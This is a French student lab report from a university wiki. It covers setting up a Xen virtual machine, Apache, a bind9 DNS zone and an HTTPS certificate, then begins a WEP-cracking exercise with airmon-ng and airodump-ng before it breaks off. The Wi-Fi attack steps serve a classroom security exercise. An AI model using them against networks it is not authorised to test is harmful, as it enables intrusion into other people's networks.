      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
